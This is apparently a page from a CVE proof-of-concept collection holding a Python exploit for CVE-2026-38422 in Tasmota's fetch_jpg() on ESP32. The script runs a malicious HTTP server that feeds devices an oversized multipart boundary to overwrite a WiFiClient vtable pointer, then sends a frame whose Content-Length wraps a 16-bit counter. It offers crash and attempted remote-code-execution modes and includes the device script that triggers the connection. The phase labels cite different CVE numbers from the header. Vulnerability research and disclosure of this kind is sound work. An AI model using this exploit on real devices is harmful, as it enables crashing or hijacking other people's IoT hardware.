5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2026-38422_poc.py PY
#!/usr/bin/env python3
"""
PoC: CVE-2026-38422
Target: Tasmota <= 15.3.0.3
File: tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino
Function: fetch_jpg()

Vulnerability:
  Combined attack vector using both overflow conditions in fetch_jpg():
  
  1. Initial connection (case 0) — boundary overflow via strcpy()
  2. Frame fetch (case 2)        — uint16_t wraparound via Content-Length

  The combination of both in a single attack session maximizes
  heap corruption and increases RCE probability on ESP32.

  Buffer layout on ESP32 heap (typical):
  
  struct JPG_TASK {              Offset  Size
    char boundary[40];           +0x00   40
    bool draw;                   +0x28    1
    uint8_t scale;               +0x29    1
    uint16_t xp;                 +0x2A    2
    uint16_t yp;                 +0x2C    2
    WiFiClient stream;           +0x2E   ~80   ← vtable ptr at +0x2E
    HTTPClient http;             +0x7E   ~200  ← vtable ptr at +0x7E
  } jpg_task;

  Overwriting WiFiClient vtable ptr with controlled value → RCE
  when any virtual method (read, write, connect) is called.

Attack Flow:
  Phase 1: Send initial response with long boundary (overflow boundary[40])
  Phase 2: Send MJPEG frame with Content-Length > 65535 (uint16_t wrap)
  Result:  Heap corruption → potential RCE / guaranteed DoS

Author: Saidakbarxon Maxsudxonov
CVE: CVE-2026-38422
"""

import socket
import argparse
import struct
import time
from datetime import datetime

BANNER = """
╔══════════════════════════════════════════════════════╗
║       CVE-2026-38422 PoC — Tasmota fetch_jpg()      ║
║       Combined Buffer Overflow → RCE / DoS           ║
║       Affected: Tasmota <= 15.3.0.3 (ESP32)         ║
╚══════════════════════════════════════════════════════╝
"""

def log(msg, level="*"):
    ts = datetime.now().strftime("%H:%M:%S")
    print(f"[{ts}] [{level}] {msg}")

# ESP32 Xtensa architecture constants
ESP32_HEAP_BASE     = 0x3FFB0000  # Typical DRAM heap start
WIFI_CLIENT_VTABLE  = 0x400D1234  # Placeholder — requires firmware analysis

def build_phase1_boundary(fake_vtable=None):
    """
    Phase 1: Overflow boundary[40] via strcpy()
    Layout: [boundary 40B][draw 1B][scale 1B][xp 2B][yp 2B][WiFiClient vtable 4B]
    Total to reach vtable: 40 + 1 + 1 + 2 + 2 = 46 bytes
    """
    if fake_vtable is None:
        # Crash mode: fill with 0x41 to confirm overflow
        payload = b"A" * 39 + b"\x00"  # null-terminate at 40
        payload += b"B" * 6             # overwrite draw/scale/xp/yp
        payload += b"C" * 4             # corrupt WiFiClient vtable
    else:
        # RCE mode: overwrite vtable with controlled address
        payload = b"A" * 39 + b"\x00"
        payload += b"\x01"              # draw = true
        payload += b"\x01"              # scale = 1
        payload += struct.pack("<H", 0) # xp = 0
        payload += struct.pack("<H", 0) # yp = 0
        payload += struct.pack("<I", fake_vtable)  # WiFiClient vtable
    
    return payload

def make_initial_response(boundary_payload):
    """HTTP response for fetch_jpg case 0"""
    boundary_str = boundary_payload.decode('latin-1', errors='replace')
    return (
        f"HTTP/1.1 200 OK\r\n"
        f"Content-Type: multipart/x-mixed-replace; boundary={boundary_str}\r\n"
        f"Connection: keep-alive\r\n"
        f"\r\n"
    ).encode('latin-1', errors='replace')

def make_overflow_frame(content_length=70000):
    """
    MJPEG frame with Content-Length > 65535 for uint16_t wraparound.
    content_length=70000 → uint16_t = 4464 → malloc(4464)
    But stream has 70000 bytes → 65536 bytes remain unread
    """
    wrapped = content_length & 0xFFFF
    # Send actual content_length bytes of data
    jpeg_payload = (b'\xff\xd8' +           # JPEG SOI
                    b'\xff\xe0\x00\x10' +    # APP0
                    b'JFIF\x00\x01\x01\x00' +
                    b'\x00\x01\x00\x01\x00\x00' +
                    b'\x41' * (content_length - 20) +  # padding
                    b'\xff\xd9')             # JPEG EOI
    jpeg_payload = jpeg_payload[:content_length]
    
    frame = (
        f"--BOUNDARY_OVERFLOW_PAYLOAD\r\n"
        f"Content-Type: image/jpeg\r\n"
        f"Content-Length: {content_length}\r\n"
        f"\r\n"
    ).encode() + jpeg_payload
    
    return frame, wrapped

def handle_client(conn, addr, mode, vtable):
    log(f"Tasmota connected from {addr[0]}:{addr[1]}", "+")
    
    try:
        # Receive HTTP request
        req = conn.recv(2048).decode('utf-8', errors='ignore')
        if req:
            log(f"HTTP request: {req.splitlines()[0]}")
        
        log("=" * 52)
        log("PHASE 1: Boundary strcpy() overflow (CVE-2026-38426)")
        log("=" * 52)
        
        # Build overflow payload
        if mode == "rce" and vtable:
            vtable_addr = int(vtable, 16)
            boundary_payload = build_phase1_boundary(fake_vtable=vtable_addr)
            log(f"Fake vtable address: 0x{vtable_addr:08X}", "!")
        else:
            boundary_payload = build_phase1_boundary()
        
        log(f"Boundary payload: {len(boundary_payload)} bytes", "!")
        log(f"Overflow: {max(0, len(boundary_payload)-39)} bytes beyond boundary[40]", "!")
        
        # Send Phase 1
        response = make_initial_response(boundary_payload)
        conn.send(response)
        log("Phase 1 sent — boundary[40] overflowed via strcpy()", "!")
        
        time.sleep(1)
        
        log("=" * 52)
        log("PHASE 2: uint16_t wraparound (CVE-2026-38427)")
        log("=" * 52)
        
        content_length = 70000
        frame, wrapped = make_overflow_frame(content_length)
        
        log(f"Content-Length header: {content_length}", "!")
        log(f"uint16_t(70000) = {wrapped} bytes allocated", "!")
        log(f"Unread stream bytes: {content_length - wrapped}", "!")
        
        conn.send(frame)
        log("Phase 2 sent — heap/stream corruption triggered", "!")
        log("Expected result: Guru Meditation Error / device reboot", "!")
        
        time.sleep(3)
        
    except BrokenPipeError:
        log("Device disconnected — likely crashed! ✓", "+")
    except Exception as e:
        log(f"Error: {e}", "-")
    finally:
        conn.close()
        log("Session complete")

def main():
    print(BANNER)
    
    parser = argparse.ArgumentParser(description="CVE-2026-38422 Combined PoC")
    parser.add_argument("--ip", default="0.0.0.0")
    parser.add_argument("--port", type=int, default=8887)
    parser.add_argument("--mode", choices=["dos", "rce"], default="dos",
                        help="dos=crash only, rce=attempt vtable overwrite")
    parser.add_argument("--vtable", type=str, default=None,
                        help="Fake vtable address for RCE (e.g. 0x3FFB1000)")
    args = parser.parse_args()
    
    log("CVE-2026-38422 — Combined Attack PoC", "+")
    log(f"Mode: {args.mode.upper()}")
    log(f"Listening: {args.ip}:{args.port}")
    log("─" * 54)
    log("Attack phases:")
    log("  Phase 1: strcpy(boundary[40]) → overflow (CVE-2026-38426)")
    log("  Phase 2: uint16_t Content-Length → wraparound (CVE-2026-38427)")
    log("─" * 54)
    log("Tasmota script to trigger:")
    log("  >D")
    log("  >B")
    log(f"  fetchjp(YOUR_IP:{args.port}/stream,0,0,1)")
    log("  >1")
    log("  =fetchjp(2,0,0,1)")
    log("─" * 54)
    
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((args.ip, args.port))
    server.listen(5)
    log("Waiting for Tasmota device...", "*")
    
    try:
        while True:
            conn, addr = server.accept()
            handle_client(conn, addr, args.mode, args.vtable)
    except KeyboardInterrupt:
        log("Stopped")
    finally:
        server.close()

if __name__ == "__main__":
    main()